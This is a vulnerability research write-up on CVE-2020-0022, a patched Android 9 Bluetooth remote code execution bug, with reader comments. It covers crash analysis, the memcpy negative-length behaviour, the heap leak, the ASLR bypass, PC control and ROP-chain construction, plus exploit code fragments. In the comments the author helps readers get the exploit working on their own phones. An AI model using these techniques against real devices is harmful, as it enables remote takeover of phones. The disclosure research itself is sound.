Nowadays, Bluetooth is an integral part of mobile devices. Smartphones interconnect with smartwatches and wireless headphones. By default, most devices are configured to accept Bluetooth connections from any
nearby unauthenticated device. Bluetooth packets are processed by the Bluetooth chip (also called a controller), and then passed to the host (Android, Linux, etc.). Both, the firmware on the chip and the host Bluetooth subsystem, are a target for Remote Code Execution (RCE) attacks.
One feature that is available on most classic Bluetooth implementations is answering over Bluetooth pings. Everything an attacker needs to know is the device’s Bluetooth address. Even if the target is not discoverable, it typically accepts connections if it gets addressed. For example, an attacker can run l2ping, which establishes an L2CAP connection and sends echo requests to the remote target.
In the following, we describe a Bluetooth zero-click short-distance RCE exploit against Android 9, which got assigned CVE-2020-0022 . We go through all steps required to establish a remote shell on a Samsung Galaxy S10e, which was working on an up-to-date Android 9 when reporting the issue on November 3 2019. The initial flaw used for this exploit is still present in Android 10, but we utilize an additional bug in Bionic (Android’s libc implementation), which makes exploitation way easier. The bug was finally fixed in the security patch from 1.2.2020 in A-143894715. Here is a demo of the full proof of concept:
Previous Work
During the work on InternalBlue and Frankenstein at SEEMOO, we spent a lot of time investigating the Braodcom Bluetooth firmware. InternalBlue was initially written by Dennis Mantz, and it interacts with the firmware to add debugging capabilities. Within this project, a lot of reverse engineering to understand the details of the firmware itself was done.
For further analysis, we built Frankenstein, which emulates the firmware for fuzzing. To achieve emulation, an essential part is understanding the Bluetooth Core Scheduler (BCS). This component is of interest, as it also processes the packet and payload header, and manages time-critical tasks. These low-level functions are not accessible from the host, and not even within the threaded components of the firmware itself. By accessing the BCS, we were even able to inject raw wireless frames into the emulated firmware.
When fuzzing with Frankenstein, we focused on vulnerabilities that arise prior to pairing. In these parts of the protocol, we found two vulnerabilities, one in classic Bluetooth and one in Bluetooth Low Energy (BLE). The first heap overflow is in the processing of Bluetooth scan results (EIR packets), affecting firmware with build dates in the range 2010-2018, possibly even older (CVE-2019-11516). For this, we provided a full RCE Proof-of-Concept (PoC) to Broadcom in April 2019. After the report, Broadcom claimed that they knew of the issue, and indeed, the newest Samsung Galaxy S10e had a patch that we were not aware of, as it just had been released. The second heap overflow affects all BLE Packet Data Units (PDUs) since Bluetooth 4.2. We provided a PoC to Broadcom in June 2019, which corrupts the heap but misses one primitive
that would be achieved with more data throughput. To the best of our knowledge, this issue has not been fixed as of February 2020.
While working on PoCs and ideas on how to get a lot of data into the heap, we also looked into classic Bluetooth Asynchronous Connection-Less (ACL) packets. These are primarily used for data transfer, such as music streaming, tethering, or, more general, L2CAP. Within the firmware, ACL processing is comparably simple. There are way more sophisticated handlers and proprietary protocol extensions, for example, Jiska Classen found a Link Mangement Protocol (LMP) type confusion (CVE-2018-19860).
Fuzzing ACL
The bug described in this post was triggered within ACL. We fuzzed this protocol by performing bit flips on the packet and payload header. The initial fuzzer was implemented by hooking the function bcs_dmaRxEnable within the firmware, which is invoked by the BCS ACL task. bcs_dmaRxEnable copies wireless frames into the transmit buffer. Prior to this function, the packet and payload headers are already written to the corresponding hardware registers. We are therefore able to modify the full packet before transmission and thus building a simple
Bluetooth fuzzer within the firmware.
In the initial setup, we run l2ping on a Linux host against an Android device over-the-air, and the Bluetooth firmware fuzzer flips bits randomly in the headers. While we were trying to crash the firmware of the Android device, instead, the Android Bluetooth daemon crashed. In the logs, we observe several crash reports like this:
pid: 14808, tid: 14858, name: HwBinder:14808_ >>> com.android.bluetooth <<< signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x79cde00000 x0 00000079d18360e1 x1 00000079cddfffcb x2 fffffffffff385ef x3 00000079d18fda60 x4 00000079cdd3860a x5 00000079d18360df x6 0000000000000000 x7 0000000000000000 x8 0000000000000000 x9 0000000000000000 x10 0000000000000000 x11 0000000000000000 x12 0000000000000000 x13 0000000000000000 x14 ffffffffffffffff x15 2610312e00000000 x16 00000079bf1a02b8 x17 0000007a5891dcb0 x18 00000079bd818fda x19 00000079cdd38600 x20 00000079d1836000 x21 0000000000000097 x22 00000000000000db x23 00000079bd81a588 x24 00000079bd819c60 x25 00000079bd81a588 x26 0000000000000028 x27 0000000000000041 x28 0000000000002019 x29 00000079bd819df0 sp 00000079bd819c50 lr 00000079beef4124 pc 0000007a5891ddd4 backtrace: #00 pc 000000000001ddd4 /system/lib64/libc.so (memcpy+292) #01 pc 0000000000233120 /system/lib64/libbluetooth.so (reassemble_and_dispatch(BT_HDR*) [clone .cfi]+1408) #02 pc 000000000022fc7c /system/lib64/libbluetooth.so (BluetoothHciCallbacks::aclDataReceived(android::hardware::hidl_vec<unsigned char> const&)+144) [...]
It seems, that memcpy is executed with a negative length inside reassemble_and_dispatch. A simplified implementation of memcpy looks as follows:
void *memcpy(char *dest; char *src, size_t *n) { for (size_t i=0; i<n; i++) dst[i] = src[i]; }
The length parameter n is of type size_t and, thus, an unsigned integer. If we pass a negative number as n, it will be interpreted as a large positive number because of the twos-complement representation.
As a result, memcpy tries to copy memory in an endless loop, which causes the crash as soon as we hit unmapped memory.
L2CAP Fragmentation
Bluetooth implements fragmentation on various layers. Within the analysis of this crash, we focus on the fragmentation of L2CAP packets passed between the controller and the host. For commands and configuration between host and controller, the Host Controller Interface (HCI) is used.
L2CAP is sent as ACL packets via the same UART wires as HCI. It needs to be fragmented to the maximum ACL packet length. During firmware initialization by the driver on the host, the HCI command Read Buffer Size. On Broadcom chips, this size is 1021. The host’s driver needs to respect these size limits when sending packets to the firmware. Similarly, the firmware also rejects L2CAP inputs that are not properly fragmented over the air. As fragmentation and reassembling happens on the host, but the firmware itself also has strict size limits, L2CAP is interesting for heap exploitation on the host and the controller.
If a L2CAP packet is received, which length is longer than the maximum buffer size of 1021, it has to be reassembled. The partial packet is stored in a map called partial_packets with the connection handle as the key. A buffer that is sufficiently large to hold the final packet is allocated, and the received data is copied to that buffer. The end of the last received fragment is stored in partial_packet->offset.
The following packets have the continuation flag set to indicate that this is a packet fragment. It is the 12th bit in the connection handle inside the ACL header. If such a packet is received, the packet content is then copied to the previous offset.
static void reassemble_and_dispatch(UNUSED_ATTR BT_HDR *packet) { [...] packet->offset = HCI_ACL_PREAMBLE_SIZE; uint16_t projected_offset = partial_packet->offset + (packet->len - HCI_ACL_PREAMBLE_SIZE); if (projected_offset > partial_packet->len) { // len stores the expected length LOG_WARN(LOG_TAG, "%s got packet which would exceed expected length of %d." "Truncating.", __func__, partial_packet->len); packet->len = partial_packet->len - partial_packet->offset; projected_offset = partial_packet->len; } memcpy(partial_packet->data + partial_packet->offset, packet->data + packet->offset, packet->len - packet->offset); [...] }
This step causes the negative length memcpy, as seen in the code above. In a situation where we get a packet and there are only 2 bytes left to receive, if the continuation is longer than expected, packet->length is truncated to avoid buffer overflows. The length is set to the number of bytes that are left to copy.
As we need to skip the HCI and ACL preamble, we use HCI_ACL_PREAMBLE_SIZE (4) as the packet offset and subtract it from the number of bytes to copy. This results in a negative length of -2 for memcpy.
This has been addressed in master but at this point in time not inandroid10-c2f2-release branch, android10-dev branch, android-10.0.0_r9 tag or the android-9.0.0_r49 tag running on the S10e at that point in time. A fix has been deployed in android-8.0.0_r43, android-8.1.0_r73, android-9.0.0_r53 and android-10.0.0_r29.
Unexpected leak
The above-mentioned bug seems not to be exploitable, as we end up in an endless memcpy. Yet, we occasionally crash in completely different locations. For example, the following crash is located in the same thread, but cannot be explained with a simple infinite copy loop. Thus, we expected to find a different bug somewhere.
pid: 14530, tid: 14579, name: btu message loo >>> com.android.bluetooth <<< signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7a9e0072656761 x0 0000007ab07d72c0 x1 0000007ab0795600 x2 0000007ab0795600 x3 0000000000000012 x4 0000000000000000 x5 0000007a9e816178 x6 fefeff7a3ac305ff x7 7f7f7f7f7fff7f7f x8 007a9e0072656761 x9 0000000000000000 x10 0000000000000020 x11 0000000000002000 x12 0000007aa00fc350 x13 0000000000002000 x14 000000000000000d x15 0000000000000000 x16 0000007b396f6490 x17 0000007b3bc46120 x18 0000007a9e81542a x19 0000007ab07d72c0 x20 0000007ab0795600 x21 0000007a9e817588 x22 0000007a9e817588 x23 000000000000350f x24 0000000000000000 x25 0000007ab07d7058 x26 000000000000008b x27 0000000000000000 x28 0000007a9e817588 x29 0000007a9e816340 sp 0000007a9e8161e0 lr 0000007a9fde0ca0 pc 0000007a9fe1a9a4 backtrace: #00 pc 00000000003229a4 /system/lib64/libbluetooth.so (list_append(list_t*, void*) [clone .cfi]+52) #01 pc 00000000002e8c9c /system/lib64/libbluetooth.so (l2c_link_check_send_pkts(t_l2c_linkcb*, t_l2c_ccb*, BT_HDR*) [clone .cfi]+100) #02 pc 00000000002ea25c /system/lib64/libbluetooth.so (l2c_rcv_acl_data(BT_HDR*) [clone .cfi]+1236) [...]
We spent a couple of sleepless nights tracking down these crashes and modified the fuzzing setup to be reproducible. However, it was not possible to reproduce these interesting crashes by replaying packets. The main issue during debugging was that we did not compile Android with an address sanitizer. This would have detected any memory corruption as it happens before crashing in a random location. So, in a moment of frustration, we decided to cheat a little bit. By keeping the payload of the L2Ping packets constant, we can compare it with the payload of the response. If the data changes meanwhile, a memory corruption took place but did not produce a crash yet. After running this for a while, we get corrupted responses like this:
With this detection method, we were even able to reproduce this behavior reliably. The following packet combination triggers it:
- L2cap packet with 2 bytes remaining for continuation ‘A’s
- Continuation longer than the expected 2 bytes containing ‘B’s
In Android logcat, we can observe the following error message:
bt_hci_packet_fragmenter: reassemble_and_dispatch got packet which would exceed expected length of 147. Truncating.
This trigger looks similar to the bug described above. Note that only the last bytes are corrupted, whereas the beginning of the packet is still correct. This behavior cannot be explained by the source code and what we know so far. A straight buffer overflow that keeps the first couple of bytes intact or overwrites pointers and offsets in such a controlled manner is rather unlikely. At this point, we decided to set breakpoints in the packet_fragmenter to observe where the packet data is modified. We used the following GDB script to debug that behavior, whereas reassemble_and_dispatch+1408 and reassemble_and_dispatch+1104 are the two memcpy in reassemble_and_dispatch as described earlier.
b reassemble_and_dispatch commands; x/32x $x0; c; end b dispatch_reassembled commands; x/i $lr; x/32x $x0; c; end b *(reassemble_and_dispatch+1408) commands; p $x0; p $x1;p $x2; c; end b *(reassemble_and_dispatch+1104) commands; p $x0; p $x1; p $x2; c; end
For the first packet containing ‘A’s, we can observe the following log. It is received as expected, and the first memcpy is triggered with a length of 0x52 bytes. This length is also visible in the BT_HDR struct inside the packet and is correct. The length included in the ACL and L2CAP header is two bytes longer than the actual payload to trigger the packet reassembling of the packet. The connection handle in the HCI header is 0x200b and indicates a start packet for the connection handle 0x0b.
The second packet also arrives correctly in reassemble_and_dispatch and the connection handle has changed to 0x100b and indicates a continuation packet. The third argument to memcpy is 0xfffffffffffffffe aka -2 as pointed out above. As memcpy treats the third parameter as an unsigned integer, this memcpy will result in a crash.
But apparently, the application continues and corrupts the last 66 bytes of the partial packet and the corrupted packet is passed to dispatch_reassembled.
memwtf(,,-2);
If we have a closer look at the actual memcpy implementation it is more complex than the simple character-wise memcpy shown above. It is more efficient to copy whole words of memory instead of individual bytes. This implementation takes it one step further and fills registers with 64 bytes of memory content before writing it to the target location. Such an implementation is more complex and has to consider edge cases such as odd lengths and misaligned addresses.
There exists a weird behavior in that memcpy implementation regarding negative lengths. As we try to copy to the end of the destination buffer, we overwrite the last 66 bytes of the L2Ping request with whatever is previous of our second packet. We have written this short PoC to test the memcpy behavior.
int main(int argc, char **argv) { if (argc < 3) { printf("usage %s offset_dst offset_src\n", argv[0]); exit(1); } char *src = malloc(256); char *dst = malloc(256); printf("src=%p\n", src); printf("dst=%p\n", dst); for (int i=0; i<256; i++) src[i] = i; memset(dst, 0x23, 256); memcpy( dst + 128 + atoi(argv[1]), src + 128 + atoi(argv[2]), 0xfffffffffffffffe ); //Hexdump for(int i=0; i<256; i+=32) { printf("%04x: ", i); for (int j=0; j<32; j++) { printf("%02x", dst[i+j] & 0xff); if (j%4 == 3) printf(" "); } printf("\n"); } }
The behavior was analyzed in Unicorn emulating the aarch64 memcpy implementation. The relevant code is shown in the following:
prfm PLDL1KEEP, [src] add srcend, src, count add dstend, dstin, count cmp count, 16 b.ls L(copy16) //Not taken as 0xfffffffffffffffe > 16 cmp count, 96 b.hi L(copy_long) //Taken as as 0xfffffffffffffffe > 96 [...] L(copy_long): and tmp1, dstin, 15 //tmp1 = lower 4 bits of destination bic dst, dstin, 15 ldp D_l, D_h, [src] sub src, src, tmp1 add count, count, tmp1 /* Count is now 16 too large. */ //It is not only too large //but might also be positive! //0xfffffffffffffffe + 0xe = 0xc ldp A_l, A_h, [src, 16] stp D_l, D_h, [dstin] ldp B_l, B_h, [src, 32] ldp C_l, C_h, [src, 48] ldp D_l, D_h, [src, 64]! subs count, count, 128 + 16 /* Test and readjust count. */ //This will become negative again b.ls 2f //So this branch is taken [...] /* Write the last full set of 64 bytes. The remainder is at most 64 bytes, so it is safe to always copy 64 bytes from the end even if there is just 1 byte left. */ //This will finally corrupt -64...64 bytes and terminate 2: ldp E_l, E_h, [srcend, -64] stp A_l, A_h, [dst, 16] ldp A_l, A_h, [srcend, -48] stp B_l, B_h, [dst, 32] ldp B_l, B_h, [srcend, -32] stp C_l, C_h, [dst, 48] ldp C_l, C_h, [srcend, -16] stp D_l, D_h, [dst, 64] stp E_l, E_h, [dstend, -64] stp A_l, A_h, [dstend, -48] stp B_l, B_h, [dstend, -32] stp C_l, C_h, [dstend, -16] ret
As we are dealing with a very large count value (INT_MAX – 2), it will always be larger than the distance between dst and src. Therefore __memcpy will never be called in our case, which makes this bug unexploitable on Android 10.
Leaking More Data
As described above, we can essentially overwrite the last 64 bytes of the packet with whatever happens to be in front of our source address. The first 20 bytes before the source buffer are always BT_HDR, acl_hdr, and l2cap_hdr. We therefore automatically leak the connection handle of the remote device.
The content of the uninitialized memory depends on the placement of the second packet buffer and therefore its size. By repeatedly sending regular L2Ping echo requests, we can try to place our own
packet data in front of the second packet. This allows us to control the last 44 bytes of the packet with arbitrary data. By shortening the first packet, we can control the full packet struct including the headers. The first packet looks like the following:
After triggering the bug, the corrupted packet looks like the following. The packet containing the ‘X’ is the one we have placed in front of our source buffer. Note, that except for the length in BT_HDR, the packet length is now 0x280 instead of 0x30. The packet->len field must be still the original length, otherwise, the reassemble method would expect further data.
This results in a much more useful leak. Note that this is a data-only attack without code execution or any other additional information required. It can also be used to inject arbitrary L2CAP traffic into any active connection handles. A successful leak might look as follows:
In order to defeat Address Space Layout Randomization (ASLR), we need the base address of some libraries. Occasionally we find an object from libicuuc.so on the heap, which has the following structure:
- Some heap pointer
- Pointer to uhash_hashUnicodeString_60 at libicuuc.so
- Pointer to uhash_compareUnicodeString_60 at libicuuc.so
- Pointer to uhash_compareLong_60 at libicuuc.so
- Pointer to uprv_deleteUObject_60 at libicuuc.so
We can use the offsets between those functions to reliable detect this structure within the leak. This allows us to compute the base address for libicuuc.so .
PC Control and Payload Location
Several libraries, such as libbluetooth.so, are protected by Clang’s Call Flow Integrity (CFI) implementation. This protects forward edges and should prevent us from simply overwriting function vtables on the heap with arbitrary addresses. Only functions that belong to the affected object should be callable. Even though, upon disconnect, we occasionally trigger the following crash when after corrupting the heap.
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x37363534333231 x0 3837363534333231 x1 000000750c2649e0 x2 000000751e50a338 x3 0000000000000000 x4 0000000000000001 x5 0000000000000001 x6 00000075ab788000 x7 0000000001d8312e x8 00000075084106c0 x9 0000000000000001 x10 0000000000000001 x11 0000000000000000 x12 0000000000000047 x13 0000000000002000 x14 000f5436af89ca08 x15 000024747b62062a x16 000000750c2f55d8 x17 000000750c21b088 x18 000000750a660066 x19 000000751e50a338 x20 000000751e40dfb0 x21 000000751e489694 x22 0000000000000001 x23 0000000000000000 x24 000000750be85f64 x25 000000750a661588 x26 0000000000000005 x27 00000075084106b4 x28 000000750a661588 x29 000000750a65fd30 sp 000000750a65fd10 lr 000000750c264bb8 pc 000000750c264c5c backtrace: #00 pc 00000000000dbc5c /system/lib64/libchrome.so (base::WaitableEvent::Signal()+200) #01 pc 00000000000add88 /system/lib64/libchrome.so (base::internal::IncomingTaskQueue::PostPendingTask(base::PendingTask*)+320) [...] #09 pc 00000000002dd0a8 /system/lib64/libbluetooth.so (L2CA_DisconnectRsp(unsigned short) [clone .cfi]+84) #10 pc 0000000000307a08 /system/lib64/libbluetooth.so (sdp_disconnect_ind(unsigned short, bool) [clone .cfi]+44) #11 pc 00000000002e39d4 /system/lib64/libbluetooth.so (l2c_csm_execute(t_l2c_ccb*, unsigned short, void*) [clone .cfi]+5500) #12 pc 00000000002eae04 /system/lib64/libbluetooth.so (l2c_rcv_acl_data(BT_HDR*) [clone .cfi]+4220) [...]
During the leak process, we do not only overflow into the negative direction, but also corrupt data that is stored after the affected buffer. In this particular case, we have overwritten a pointer stored in X0.
By looking at the location in the code, we crash the instructions before a branch register controlled by X0.
dbc5c: f9400008 ldr x8, [x0] // We control X0 dbc60: f9400108 ldr x8, [x8] dbc64: aa1403e1 mov x1, x20 dbc68: d63f0100 blr x8 // Brach to **X0
If we know an address where we can store arbitrary data, we can control pc! libchrome.so was not compiled with CFI enabled. Our packet data has to be stored on the heap somewhere, but we also need a way to retrieve the address, to gain RCE. This was achieved as the partial packets are stored in a hash map with the connection handle as a key:
BT_HDR* partial_packet = (BT_HDR*)buffer_allocator->alloc(full_length + sizeof(BT_HDR)); [...] memcpy(partial_packet->data, packet->data, packet->len); [...] partial_packets[handle] = partial_packet;
This will allocate a map object on the heap, holding the key (handle) and a pointer to our packet. Eventually, we can leak this map object, revealing the pointer to our buffer. As the key is known we can use it to detect this object in the leak. By using the maximum allowed packet size, we have a couple of hundreds of bytes to store our ROP chain and payload.
This overall method is not perfectly reliable but works in 30%-50% of the cases. Even though the Bluetooth daemon is restarted automatically and forked by the same process. Therefore, the address space is only randomized on boot. Even if we crash the daemon, it is restarted with the same address layout, so an attacker can try over and over again to gain RCE.
Calling system();
Even though we know the absolute address of the libicuuc.so, the offsets between the libraries are randomized as well. Therefore we only have gadgets available in that library.
The libicuuc.so calls no interesting functions, such as system calls. At this point Fabian Beterke pointed out, that it would be a good idea to check the library imports for something interesting.
We have no direct use of system or execve, but we have dlsym available. This function requires a handle (e.g. NULL pointer) and a function name as an argument. It resolves and returns the address of that function and can be used to obtain the address to system. Therefore we need to perform a function call and return from it in a controlled way. In ROP, this is usually not a problem, as the gadgets have to end with a return anyway. However, we have no way to perform a stack pivot required for ROP. Thus, we have to use C++ object calls to perform the desired operations, which are often relative to X8 or X19. As a consequence, we have lots of relative references in our payload. To keep track of already used offsets, we implement a function called set_ptr( payload, offset, value), that will throw an error if a given offset in the payload is already used. We also keep track of the register values in order to simplify the process.
To return cleanly from dlsym, we used a deconstructor called u_cleanup_60. It iterates over a list of functions if a pointer is not NULL, the address is called and cleared. This is quite convenient, as we can call dlsym and can control the execution after the return, without a stack pivot.
ldr x8, [x19, #0x40]; cbz x8, #0xbc128; blr x8; str xzr, [x19, #0x40]; ldr x8, [x19, #0x48]; cbz x8, #0xbc138; blr x8; str xzr, [x19, #0x48]; ldr x8, [x19, #0x50]; cbz x8, #0xbc148; blr x8; str xzr, [x19, #0x50]; ldr x8, [x19, #0x58]; cbz x8, #0xbc158; blr x8;
To set x19, lets first recap the preconditions:
- x0 points to our buffer
- We know the address of our buffer
- The first address in our buffer is a pointer, that points to a pointer to our gadget
Furthermore, we have a list of gadgets in a text file so we can grep for them. We can discard all gadgets, that end with a ret instruction, as we can’t use them right now. There are still several gadgets left, that will end with a br register or blr register instruction that can be used. In addition, we need a gadget, that loads data relative to x0, as this is the only register with a known value. So you might run something like this
cat gadgets | grep -v ret | grep "ldr x., \[x0"
You might find a gadget, that looks like this:
ldr x0, [x0, #8] ; ldr x8, [x0] ; ldr x2, [x8, #0x20] ; br x2
This gadget has two properties, that makes it useful:
- It allows specifying the next gadget by using registers, that we have already under control
- It performs a useful operation. In this case, set x8 to point within our buffer.
This gives us one more degree of freedom, as we can now also utilize gadgets, that are using x8. So, we will populate our payload buffer with lots of pointers that point into our buffer and are referenced relative to some offset, which gets confusing quickly. Therefore it is helpful to keep track of already used offsets (accomplished by the set_ptr function as described above) as well as register values. New register values have to be chosen in a way that avoids collisions. This way, we can change the offset of register values within the buffer without too much effort.
# Initial condition # Signal() ldr x8, [x0], ldr x8, [x8], mov x1, x20; blr x8 # x0 points to our buffer pc_offset = 0x18 # Arbitrary offset x0 = payload_base # Initial **x0 = gadget1 set_ptr( payload_ptr, x0 - payload_base, payload_base + pc_offset) # Set x8 - Set gadget g = find_gadget(sys.argv[2], "ldr x0, [x0, #8] ; ldr x8, [x0] ; ldr x2, [x8, #0x20] ; br x2") set_ptr( payload_ptr, pc_offset, g + libicuuc_base) # Set x8 - Set registers values x0_new = payload_base + 0x30 # Arbitrary offset set_ptr( payload_ptr, x0 - payload_base + 0x8, x0_new) x0 = x0_new x8 = payload_base + 0x8 # New x8 also arbitrary offset set_ptr( payload_ptr, x0 - payload_base, x8) pc_offset = x8 - payload_base + 0x20
Next, we can use a gadget like the following in a similar way to get x19 under control.
ldr x8, [x8, #8] ; mov x19, x0 ; mov x0, x22 ; blr x8
Disclosure and Closing Words
This bug was initially sent to the Android Security Team and on November 3 2019, including a PoC. It was fixed on February 1, 2020, and acknowledged by the Android Security Team. I would like to thank the team to coordinate the process and providing a fix. Also, I would also like to thank Jiska Classen and Fabian Beterke for their assistance. Additionally, we want to give a shout-out to Swing’Blog and Marcin Kozlowski who was the first to our knowledge reversing the key idea of the vulnerability.
Scripts for testing can be downloaded here The ROP chain has been removed from the exploit. The archive contains the following files:
- python2 simple_crash.py target PoC for crashing the remote device
- python2 simple_leak.py target PoC for the section “Unexpected leak”
- python2 fancy_leak.py target PoC for the section “Leaking More Data”
- python2 memcpy.py libc.so memcpy Unicorn emulation of memcpy for section “memwtf(,,-2);”
- python2 exploit.py target remote_libicuuc.so exploit excluding ROP chain
Also lots of thanks to Polo35, who provided a PoC working on 32bit using a different exploit strategy. For further details check out his repo.
use my mask to exchange ROP 😂
Sorry, we can’t accept that. We need toilet paper!
Not that important, but I reversed the idea behind the vulnerability on 12th Feb 2020. Swing’s post is dated to 16th Feb 2020. Here is my post, as a proof: https://seclists.org/fulldisclosure/2020/Feb/10 Could not crash the process outside GDB and many other unknowns at that time. Also we exchanged some communication with Swing in that time periods. Great guy as you as well. More info also in my Repo, maybe you will find it useful: https://github.com/marcinguy/CVE-2020-0022
Sorry, I forgot. We have checked your repo quite often and found Swing that way (I’ve updated the post).
The problem is that a crash is an edge case, at least form ARM64. If you randomly corrupt data on the heap, crashes are non-reproducible. For the memcpy to crash, the lower nibble of the address has to be 0 or 1 for a length of -2. Therefore the chances are also quite low if you do not change the packet length. That was also the reason, why we do not provide a crash-only PoC. By messing around and looking at the responses, you can see that something is going on. We tried not to point people to the memcpy implementation, but without any luck.
I guess, your commit history is a good example, why quarterly updates are not a good idea in general.
I’m suryanarayanan from India I want to know how to fast boot Redmi note 4 and my android version is not at all upgraded only Miui version updated and patch update not updated 2018 patch version is still running on my mobile how to update it and all apps are running in wifi notification don’t disturb mode
Hi Suryanarayanan,
I do not own a Redmi Note 4 myself, but to enter fastboot Power + Vol Down should work [1]. If you are running a MIUI Os, can you tell us the version number and the Security patch level? You could try to upgrade to Miui v11. It seems to be the latest, still supported version and should support Android 10, which is not vulnerable for RCE.
best greets to India,
Jan
[1] https://www.hardreset.info/devices/xiaomi/xiaomi-redmi-note-4-64gb/fastboot-mode/
I’m using a pixel 2 XL, Android 9 with August 1 2019 security patch and I keep getting a connection reset when i run exploit.py. Logs are indicating “bt_btm_sec: btm_sec_disconnected clearing pending flag handle:9 reason:22”. Have you encountered such issues before?
Hi,
Nexus and Pixel devices, seem to always respond with an empty L2CAP Echo Response. Therefore this leak technique does not work on those devices. Eventually, this can be solved differently, but we have not evaluated the possibility. The overflow of the signal object without CFI should beave the same. To validate the presence of the bug, I’ve added a script simple_crash.py to the archive above.
Best, Jan
Hi Jan,
Thank you for your reply. In my case, my Pixel phone is responding with a non-empty L2CAP Echo Response. fancy_leak.py actually works, I see portions of my phone’s memory in the response packets, just that after a while the same “reason:22” causes the connection to be broken. Does your Pixel phones behave the same way?
A quick research shows that “reason:22” means “the host terminates the link itself”, which in this case is the Android device terminating the link. I’m trying to find out why is this the case but apparently I’m out of ideas on what to try.
BTW, I tried this on a Huawei Mate 9 and the same behavior appears.
Hi Jack,
Interesting to know, that your pixel responds to L2CAP echo requests, no idea why some devices behave differently.
If you see the leaked data you are golden. We have also encountered the phone is closing the connection if you send garbage for too long. It is no problem as you can reconnect if the remote side closes the connection. It is also helpful, as it mixes up the heap a bit.
Cheers, Jan
Hi,
I am trying to repeat the described memory leak on my LeEco 2 with DotOS (Android 8) using fancy_leak.py script, but I encountered a pit. I can call do_leak() only once at a time, because when the script wants to do it next time it don’t receive echo response from smartphone. Can you give an advise why this happens?
Thanks, Tracy.
Hmm, this sounds, as if the remote site crashes. Do you see anything interesting in logcat (e.g. logcat | grep $(pgrep droid.bluetooth) ) ? If this is the case, there are two possible reasons for that:
1) The memory layout is slightly different, so an edge-case is triggered, where the memcpy will crash or some other data is corrupted.
2) memcpy is not vulnerable. Can you provide the libc.so? you can use the memcpy.py script to test the libc. If the script crashes with a Memory Unmapped error, the implementation is most likely not vulnerable. For android 10 this is the case, as they wrap memcpy with memmove.
Did you have any success with the simple_leak.py ? This will do the same as do_leak but not try to overwrite the packet in memory. Therefore it is more stable.
Edit: Fixed wrong logcat grep cmd.
Thank you for your reply. First of all, memcpy on my device must be vulnerable for 2 reasons: my device is running undo Android 8 with CVE from summer 2018 and second, I examined memcpy function using IDA Pro and found the same bugs as you described. So, this shouldn’t affect the whole process.
But thanks to your advice I had a look through bluetooth logs and found out, that my device can’t reconnect to PC after bluetooth daemon crash until hci socket on my PC isn’t reloaded. (I am new to bluetooth logs, so correct me if I’m wrong. Bluetooth log:https://gist.github.com/Roo4L/eefd626bb62ad34a6976cccce8c878c2)
Have you faced the same issue? I guess, it’s very easy to fix by modifying your scripts. I will try this right now, but I want to discover roots of this problem. Do you have any ideas?
P.S.: I said, that it is very easy to fix, but suddenly realized, that after reload connection handle can change, which affect fancy_leak.py script. Is it right?
What you said is correct, the connection handle can change upon re-connect. The local handle should be extracted from the HCI connection response. The remote handle is important later in fancy_leak.py as it will be overwritten during the memory corruption and therefore must be set correctly. Otherwise, your leaked data will end up in an invalid or other connection. However do_leak is the function, that should leak the remote handle. It is odd, that this function only works once. It would be good to know if simple_leak.py works, what is essentially a wrapper for this function.
Sending l2cap traffic using HCI sockets can indeed sometimes cause nasty errors. So restarting Bluez and the controller can help sometimes. My laptop has a switch to disable the controller in hardware and I used it quite often if something is not working. You can also use regular l2ping to check if your setup is operational.
From your logs, it looks as if there might some other Bluetooth traffic (maybe HID?) in the background is background going on? If both devices are not paired, the attack might become easier as there are fewer side effects.
Sorry, that I did not bother to clean up the code… (:
Hi,
I was trying to run simple_crash.py against Nexus 5x and Google Pixel with Android 8.1.0(unpatched), but I didn’t see any crash on target devices. Could you give me any clue about it? Thanks!
Did you have a look on the device with adb shell “logcat | grep -i fatal” ?
Otherwise, you might want to have a look in Wireshark, if L2CAP echo requests are actually sent to the target device. If you are not using hci0, you need also to adapt the bind command.
yes, I used “logcat | grep -i fatal” to check the crash. L2CAP echo requests work well from wireshark. My test machine is Kali linux vm in Macbook Pro 16, in Kali I run the command “hciconfig hci up”, actually I didn’t see the log like “bt_hci_packet_fragmenter: reassemble_and_dispatch …” through adb shell logcat, it seems it failed to hit the patched condition. Do I need to switch to other host machine to test, like Windows host machine?
Uff, that sounds weird. I’ was using a native Arch Linux, Windows will probably not work. Can you run a normal l2ping inside your Kali VM gainst your device? Do you see any response from the echo requests emitted by simple_crash.py in Wireshark? Have you also tried logcat | grep $(pgrep droid.bluetooth) ?
Every L2CAP packet is processed by the reassemble_and_dispatch function. So as soon, as the first packet arrives correctly, you should see some error message by this function unless you send a 2-byte continuation packet every time.
Otherwise a pcap would be great to debug the problem.
great work!
about the rop chain,where are you find the ‘ u_cleanup_60’?can you description more details?
All the required gadgets are within the libicuuc.so . The problem is, that the offset between the libraries is not deterministic as the device reboots. Therefore we are stuck to that library, as this was the only one we could reliably determine the base address from. Therefore we also require dlsym to get the address of system, otherwise, it would be easier.
On some builds, this function might not be export as a symbol. You might search for functions with the prefix u_cleanup and go from there, then you should find it.
yes,thanks,I find one function” u_clean_up_58″ like you description (phone is nexus 6p,version 8.1.0,kernel version 3.10.73), but the opcode:
LDR X8, [X19,#(qword_1AC100 – 0x1AC0C0)]
CBZ X8, loc_75DA0
BLR X8
STR XZR, [X19,#(qword_1AC100 – 0x1AC0C0)]
loc_75DA0 ; CODE XREF: sub_75CF8+9C↑j
LDR X8, [X19,#(qword_1AC108 – 0x1AC0C0)]
CBZ X8, loc_75DB0
BLR X8
STR XZR, [X19,#(qword_1AC108 – 0x1AC0C0)]
loc_75DB0 ; CODE XREF: sub_75CF8+AC↑j
LDR X8, [X19,#(qword_1AC110 – 0x1AC0C0)]
CBZ X8, loc_75DC0
BLR X8
STR XZR, [X19,#(qword_1AC110 – 0x1AC0C0)]
different with the “u_clean_up_60” descriptions,it can continue exploit?
and other question,do you need calculate the address of dlsym? and base on function u_clean_up,how to build rop can transfer arguments to dlsym and system call ? please give too much informations,thank you very much!
Great, that looks correct! Yes, you can still use that function, the registers are the same. The key is, that you can call an arbitrary function and return in a controlled manner and call your next gadget. In addition, you can now also use gadgets, the end with a return. This gives you much more flexibility in building your ROP chain. So what you do is something like this:
#set X19 to point in your buffer
x19+a = set_x1_to_string_system_ret
x19+b = set_x0_to_NULL_ret
x19+b = dlsym
x19+c = save_x0_to_register_ret
x19+d = set_x0_to_shell_cmd_ret
